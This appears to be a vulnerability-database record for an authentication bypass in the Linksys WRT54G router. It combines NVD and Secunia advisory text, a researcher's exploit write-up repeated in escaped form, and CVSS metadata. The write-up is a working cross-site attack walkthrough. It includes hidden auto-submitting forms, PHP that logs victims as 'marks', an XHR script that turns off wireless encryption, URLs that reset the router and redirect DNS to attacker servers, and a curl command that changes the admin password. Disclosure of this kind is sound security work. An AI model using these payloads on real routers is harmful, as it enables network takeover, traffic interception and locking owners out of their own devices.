VAR-200803-0170

Vulnerability from variot - Updated: 2023-12-18 11:26

The web interface on the Linksys WRT54G router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202, and this issue may overlap with it. In short, a third party can perform any administrative action through a direct request to any of the twenty scripts listed. The Linksys WRT54G Wireless-G Router is therefore prone to multiple authentication-bypass vulnerabilities. Successful exploits allow unauthenticated attackers to reach administrative functionality and completely compromise vulnerable devices; other attacks are also possible. The issues affect firmware v1.00.9; other versions may also be vulnerable. ----------------------------------------------------------------------



TITLE: Linksys WRT54G Security Bypass Vulnerability

SECUNIA ADVISORY ID: SA29344

VERIFY ADVISORY: http://secunia.com/advisories/29344/

CRITICAL: Less critical

IMPACT: Security Bypass

WHERE:

From local network

OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/

DESCRIPTION: meathive has reported a vulnerability in Linksys WRT54G, which can be exploited by malicious people to bypass certain security restrictions.

The vulnerability is caused due to improper authorization checks when performing administrative actions via the web interface. This can be exploited to perform restricted actions by directly accessing Basic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri, dmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri, vpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri, ping.tri, tracert.tri, or rstatus.tri.

WRT54G v5/v6: Install version 1.02.5.

WRT54G v8: Install version 8.00.5.

WRT54G v8.2: Install version 8.2.05.

PROVIDED AND/OR DISCOVERED BY: meathive

ORIGINAL ADVISORY: http://kinqpinz.info/lib/wrt54g/own.txt





++| Intro

This text is in addition to the findings I have already made public regarding the Linksys WRT54G wireless router and firewall gateway device. The scripts that process configuration changes do not require authentication and therefore can be altered remotely via simple form submissions written in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous findings and the demo page with sample exploits.

++| Let's Get Dirty

You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows how forms can be constructed in HTML that take advantage of the major flaws present within the insecure router. In my previous documentation I showed how it is possible to alter configuration parameters both via Linux command line using curl and HTML form submissions. In this text I demonstrate how to do these very same things transparently using a combination of HTML form construction with JavaScript that automagically submits our desired changes.

The JavaScript is simple and is used only to submit the form: a mechanism that needs nothing from the user and lands them on their router, which then prompts them to log in. Once again, THE REQUEST TO AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all that is required to submit a form built from the GET parameters observed in the device's Web interface.

document.f.submit();

This submits the form hidden within the Web page. Our first example enables wireless access with an SSID of our choosing. In this instance, I will use the SSID "kinqpinz".

<form name="f" action="http://192.168.1.1/WBasic.tri" method="POST">
  <input type="hidden" name="submit_type" value="">
  <input type="hidden" name="channelno" value="11">
  <input type="hidden" name="OldWirelessMode" value="3">
  <input type="hidden" name="Mode" value="3">
  <input type="hidden" name="SSID" value="kinqpinz">
  <input type="hidden" name="channel" value="6">
  <input type="hidden" name="Freq" value="6">
  <input type="hidden" name="wl_closed" value="1">
  <input type="hidden" name="sesMode" value="1">
  <input type="hidden" name="layout" value="en">
</form>

The reason this works is simple: the configuration parameters appear in the URL of the Web interface, hosted by default at http://192.168.1.1, and anyone can read them off while configuring the device. The form above simply reproduces the parameters that the router's WBasic.tri script processes. The URL would resemble the following if you viewed it in your browser:

http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en

It's simple enough to understand what's going on: each variable passed in the URL describes its purpose, at least the important ones such as "SSID" and "channel". The only tricky part is that you cannot alter settings simply by loading a URL like the one above. That issues a GET request, and a GET request does nothing; it is the POST request that actually triggers the configuration change. Below I describe a real-world attack scenario that combines knowledge of the device, embedded HTML and JavaScript, and a touch of PHP to grab the mark's external IP.

++| Remote Real World Attack Scenario

So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It has made a few assumptions about your environment, however. The major one is that you have kept the router's default LAN gateway address, 192.168.1.1. Whatever other changes you have made to the router in terms of security (a strong password, wireless encryption, access restrictions) are useless against this attack, because the scripts never ask for credentials. This brings us to an important lesson concerning the WRT54G: do NOT retain the default local address of 192.168.1.1. Change it so that you do not fall victim to a malicious individual hosting the code presented in this text. Bear in mind that this only denies an attacker the default guess; the firmware versions listed in the Secunia advisory above are the actual fix.

++| Remote Real World Attack Scenario Requirements

On http://www.hacker.tld a page is hosted that contains the following:
  (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely;
  (2) JavaScript that submits these forms transparently;
  (3) PHP or similar server-side code that acquires the mark's external IP address as they browse the page; and,
  (4) PHP or similar server-side code that retains the mark's external IP address in the event that the remote form submission is successful, thus allowing the remote attacker to further exploit the device.

http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP is used (though any server-side language is suitable) to obtain the external IP of any individual viewing the exploit page and write it to a log file.

<?php
  $ip=$_SERVER['REMOTE_ADDR'];
  $toWrite="Potential mark resides at $ip\n\n";
  $f=fopen("mark.txt", "a+");
  fwrite($f, $toWrite);
  fclose($f);
?>

The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute and submitting the form.

document.f.submit();

All hacker.tld needs now is the form holding the URL params, conveniently kept out of sight in <input type="hidden"> fields.

What you should observe from this is the form name of "f" which is used in the JS to submit the form as well as the various 'name' and 'value' attributes that are used to create a URL such as this:

submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en

Do note that without any one of these parameters the exploit fails and nothing changes. All of them must remain in place even if they do not obviously matter; they are simply options that the processing script, in this case WBasic.tri, requires before fulfilling the request. Case matters, and do not forget that the request must be a POST, not a GET. Different configuration changes also go through different scripts, so WBasic.tri is not used for, say, enabling or disabling the firewall log.

Now that the malicious page has been composed and sits online living and waiting for marks at http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom PHP logging script. In mark.txt, our logging file, sample output would resemble something like the following.

Potential mark resides at 1.1.1.1

Potential mark resides at 2.2.2.2

Potential mark resides at 3.3.3.3

So forth...

They are only potential marks because it is unknown whether they are using a WRT54G with an exploitable firmware version, whether the attempt failed (perhaps because the mark cancelled the request before it completed), or whether they have changed the default local address (good for them) that this attack relies on.

When they browse the page, because we have set no delay for this change, they are instantly redirected to http://192.168.1.1/WBasic.tri. Because the request is a POST, none of the parameters appear in the address bar, so even an educated user gets no hint of what has just happened and more often than not carries on unaware. At the same time our PHP script has logged the visit to mark.txt, which we can retrieve at our leisure to test whether the remote host is vulnerable. At the very least, we may decide to reset the router completely so that we know its exact state, which makes further compromise a snap, such as altering the device's DNS settings to sniff traffic. This is quite feasible; here's how.

The reset form posts to factdefa.tri with just two parameters, which gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en

Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs all incoming and outgoing requests before passing them on to the next in line.

The Basic.tri form is indeed convoluted, but all of these values must be in place for the change to succeed. What does it do? It overrides whatever DNS settings were set either by our mark or by their ISP with our own custom values; in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 to 5.6.7.8, and DNS server #3 to 9.8.7.6. Typically these values are populated by the router itself while obtaining its dynamic IP from the ISP. In case you're curious, these fields construct the following URL, which is submitted to http://192.168.1.1/Basic.tri.

http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en

++| An Alternative (with JavaScript)

This is the basic exploitation method, although the attacker has many alternatives for submitting configuration changes if you allow client-side scripts, namely JavaScript, to execute. One alternative is a JavaScript onClick handler on a normal-looking HTML anchor that submits the parameters with XMLHttpRequest, e.g., a link whose visible text reads:

This looks innocent enough.

...where xhrRequest sends preset configuration parameters the moment our mark clicks this ordinary-looking navigation link, e.g.:

var xhr=false;
if(window.XMLHttpRequest) {
  xhr=new XMLHttpRequest();
} else if(window.ActiveXObject) {
  xhr=new ActiveXObject("Microsoft.XMLHTTP");
}
function xhrRequest() {
  if(xhr) {
    xhr.open("POST", "http://192.168.1.1/Security.tri", true);
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange=function() {
      if(xhr.readyState == 4 && xhr.status == 200) {
        var success=xhr.responseText;
      }
    }
    xhr.send("SecurityMode=0&layout=en");
  }
}

The example above effectively disables all wireless encryption, so if you happen to live close enough to this poor individual, their wireless is now open to everybody in the neighborhood. Security.tri is the script already covered by CVE-2006-5202. Note that this XHR variant is a cross-origin request: browsers that implement CORS send a form-encoded POST like this one without a preflight, but the same-origin policy stops the page from reading the router's response (so the success variable is never populated), and older browsers refuse the cross-origin open() outright; the plain form submission used above has neither limitation. Here's the URL for disabling wireless encryption:

http://192.168.1.1/Security.tri?SecurityMode=0&layout=en

++| An Alternative (without JavaScript)

You're still exploitable even if you do not allow scripts to execute, e.g., you use Firefox + NoScript. Our hackerific page at http://www.hacker.tld/index.php can still use innocent-looking methods of compromising your WRT54G, for example user registration for a bulletin board or forum. The site must collect a minimal amount of information to create the account, and it is alongside this data that we submit our own payload; perhaps this time we'd like to enable the DMZ for complete access to any and all shares/services on our mark's computer. Here is the corresponding URL (dmz_ipaddr is the last octet of the LAN host, so 100 means 192.168.1.100, the first address of the default DHCP range seen in the Basic.tri parameters above):

http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en

Again a different script, dmz.tri, processes the request on behalf of the router's internal operating system, but it still requires no authentication before changing the settings we wish to change. All hacker.tld must do is replace the hidden inputs with the parameters for whatever he or she wishes to alter and add them to a user registration page with the standard Username, Password and Confirm Password fields found on traditional forums these days. The mark submits the form and exploits his or her own router, despite believing themselves at least minimally savvy for combining Firefox and NoScript to combat hackers and their methods. It works because the fields holding the router configuration are hidden while the normal registration fields are not, so the mark has no way of knowing what supplementary data hacker.tld has appended. Even if the mark has detected that an attack is taking place, it is likely too late: the mastermind behind http://www.hacker.tld/ is running tail -f on his or her Web server logs to snatch up targets immediately. Once a request is submitted, the hacker knows the Linksys WRT54G applies configuration changes within 10 seconds, which is plenty of time to open another terminal and change the administrative login to lock the mark out of their own settings, e.g.:

curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http:///manage.tri

Here the hacker can log in as admin with the password 'pwn' and is free to REMOTELY monitor the mark's internal and outgoing network traffic: capturing passwords via DNS poisoning on the router, man-in-the-middle attacks by pointing the router's local address at a rogue DHCP server and hence the attacker's rogue network, and more.

++| Conclusion

It is my intention in finalizing this document that the reader understands that Linksys WRT54G firmware version 1.00.9 does not care whether you are inside or outside its local network, nor whether you hold the level of privilege one would think necessary for manipulating sensitive settings.

Thanks go to hw2B for suggesting I write all of this garbage out.

++| URLs

https://kinqpinz.info/lib/wrt54g/ (demonstration page with embedded HTML forms found in this document)
https://kinqpinz.info/lib/wrt54g/own.txt (initial findings from February 2008)
https://kinqpinz.info/lib/wrt54g/own2.txt (this document)
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 (CVE-2008-1247)


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200803-0170",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "wrt54g",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linksys",
        "version": "*"
      },
      {
        "model": "wrt54g",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco linksys",
        "version": "1.00.9"
      },
      {
        "model": "wrt54g",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linksys",
        "version": "1.00.9"
      },
      {
        "model": "wrt54g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linksys",
        "version": "v1.01.0.9"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "28381"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1247"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:1.00.9:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2008-1247"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "meathive",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "64904"
      },
      {
        "db": "PACKETSTORM",
        "id": "67644"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2008-1247",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": true,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2008-1247",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-31372",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2008-1247",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200803-125",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-31372",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-31372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2008-004203"
      },
      {
        "db": "NVD",
        "id": "CVE-2008-1247"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200803-125"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri.  NOTE: the Security.tri vector is already covered by CVE-2006-5202. The problem is CVE-2006-5202 And may overlap.A third party may perform any administrator action through the following direct requests: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. \nSuccessful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. \nThe issues affect firmware v1.00.9; other versions may also be vulnerable. ----------------------------------------------------------------------\n\nA new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI\nhas been released. The new version includes many new and advanced\nfeatures, which makes it even easier to stay patched. 
\n\nDownload and test it today:\nhttps://psi.secunia.com/\n\nRead more about this new version:\nhttps://psi.secunia.com/?page=changelog\n\n----------------------------------------------------------------------\n\nTITLE:\nLinksys WRT54G Security Bypass Vulnerability\n\nSECUNIA ADVISORY ID:\nSA29344\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/29344/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nmeathive has reported a vulnerability in Linksys WRT54G, which can be\nexploited by malicious people to bypass certain security\nrestrictions. \n\nThe vulnerability is caused due to improper authorization checks when\nperforming administrative actions via the web interface. This can be\nexploited to perform restricted actions by directly accessing \nBasic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri,\ndmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri,\nvpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri,\nping.tri, tracert.tri, or rstatus.tri. \n\nWRT54G v5/v6:\nInstall version 1.02.5. \n\nWRT54G v8:\nInstall version 8.00.5. \n\nWRT54G v8.2:\nInstall version 8.2.05. \n\nPROVIDED AND/OR DISCOVERED BY:\nmeathive\n\nORIGINAL ADVISORY:\nhttp://kinqpinz.info/lib/wrt54g/own.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. 
\nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \t __  _  ____  ____    ___   ____  ____  ____   _____      ____  ____   _____   ___\n\t|  l/ ]l    j|    \\  /   \\ |    \\l    j|    \\ |     T    l    j|    \\ |     | /   \\\n\t|  \u0027 /  |  T |  _  YY     Y|  o  )|  T |  _  Yl__/  |     |  T |  _  Y|   __jY     Y\n\t|    \\  |  | |  |  ||  Q  ||   _/ |  | |  |  ||   __j     |  | |  |  ||  l_  |  O  |\n\t|     Y |  | |  |  ||     ||  |   |  | |  |  ||  /  | __  |  | |  |  ||   _] |     |\n\t|  . \n\n++| Intro\n----------------------\nThis text is in addition to the findings I have already made public regarding the Linksys WRT54G \nwireless router and firewall gateway device. The scripts that process configuration changes do not \nrequire authentication and therefore can be altered _remotely_ via simple form submissions written \nin HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous \nfindings and the demo page with sample exploits. \n\n++| Let\u0027s Get Dirty\n----------------------\nYou may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows\nhow forms can be constructed in HTML that take advantage of the major flaws present within the \ninsecure router. In my previous documentation I showed how it is possible to alter configuration \nparameters both via Linux command line using curl and HTML form submissions. In this text I \ndemonstrate how to do these very same things transparently using a combination of HTML form \nconstruction with JavaScript that automagically submits our desired changes. 
\n\nThe JavaScript is simple and is only used for submitting the form - a user-free mechanism that will \nredirect the user to their router and prompts them to log in. Once again, THE REQUEST TO \nAUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all \nthat is required in order to submit our form that will be constructed using GET parameters observed \nfrom the device\u0027s Web interface. \n\ndocument.f.submit();\n\nThis submits forms hidden within the Webpage. Our first example code enables wireless access with an\nSSID of our choosing. In this instance, I will use the SSID \"kinqpinz\". \n\n\u003cform name=\"f\" action=\"http://192.168.1.1/WBasic.tri\" method=\"POST\"\u003e\n  \u003cinput type=\"hidden\" name=\"submit_type\" value=\"\"\u003e\n  \u003cinput type=\"hidden\" name=\"channelno\" value=\"11\"\u003e\n  \u003cinput type=\"hidden\" name=\"OldWirelessMode\" value=\"3\"\u003e\n  \u003cinput type=\"hidden\" name=\"Mode\" value=\"3\"\u003e\n  \u003cinput type=\"hidden\" name=\"SSID\" value=\"kinqpinz\"\u003e\n  \u003cinput type=\"hidden\" name=\"channel\" value=\"6\"\u003e\n  \u003cinput type=\"hidden\" name=\"Freq\" value=\"6\"\u003e\n  \u003cinput type=\"hidden\" name=\"wl_closed\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"sesMode\" value=\"1\"\u003e\n  \u003cinput type=\"hidden\" name=\"layout\" value=\"en\"\u003e\n\u003c/form\u003e\n\nThe reason this works is simple: configuration parameters are constructed in the URL in the Web \ninterface, hosted by default at the address http://192.168.1.1. One can view these parameters while \nconfiguring their device. The code above simply constructs a URL that is processed by the router\u0027s \nIOS script WBasic.tri. 
The URL resembles the following if you were to view it within your browser:\n\nhttp://192.168.1.1/WBasic.tri?submit_type=\u0026channelno=11\u0026OldWirelessMode=3\u0026Mode=3\u0026SSID=kinqpinz\u0026channel=6\u0026Freq=6\u0026wl_closed=1\u0026sesMode=1\u0026layout=en\n\nIt\u0027s simple enough to understand what\u0027s going on. Each variable passed in the URL describes exactly \nwhat its purpose is - at least the important ones such as \"SSID\" and \"channel\". The only tricky part \nto exploiting the router is the fact that you cannot alter settings using a URL like the one above. \nThat would result in a GET request on behalf of the device, whereas we\u0027re interested in POST \nrequests that actually trigger configuration changes. A GET request does nothing. Below I describe \na real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, \nand a touch of PHP to grab the mark\u0027s external IP. \n\n++| Remote Real World Attack Scenario\n----------------------\nSo http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It \nhas made a few assumptions about your environment, however. One major assumption is that you\u0027ve \nkept your router\u0027s default local gateway address, namely 192.168.1.1. No matter what other changes \nyou\u0027ve made to the router in terms of security, e.g., strong password, wireless encryption, access \nrestrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do \nNOT retain the default local address of 192.168.1.1. It is pertinent that you change this address so \nthat you do not fall victim to a malicious individual hosting code that will be presented in this \ntext. 
\n\n++| Remote Real World Attack Scenario Requirements\n----------------------\nOn http://www.hacker.tld a page is hosted that contains the following:\n  (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely;\n  (2) JavaScript that submits these forms transparently;\n  (3) PHP or similar server-side code that acquires the mark\u0027s external IP address as they browse \n  the page; and,\n  (4) PHP or similar server-side code that retains the mark\u0027s external IP address in the event that \n  the remote form submission is successful, thus allowing the remote attacker to further exploit the \n  device. \n\nhttp://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP \nis used - though any server-side language is suitable - for obtaining the external IP of any \nindividual viewing the exploit page and writes this information to a log file. \n\u003c?php\n  $ip=$_SERVER[\u0027REMOTE_ADDR\u0027];\n  $toWrite=\"Potential mark resides at $ip\\n\\n\";\n  $f=fopen(\"mark.txt\", \"a+\");\n  fwrite($f, $toWrite);\n  fclose($f);\n?\u003e\n\nThe JavaScript is as simple as retrieving the form object identified by the \u0027name\u0027 HTML attribute \nand submitting the form. \n\n\u003cscript type=\"text/javascript\"\u003e\n  document.f.submit();\n\u003c/script\u003e\n\nAll hacker.tld needs now is the forms used to store the URL params, conveniently hidden using the\nHTML form\u0027s \u0027hidden\u0027 attribute. 
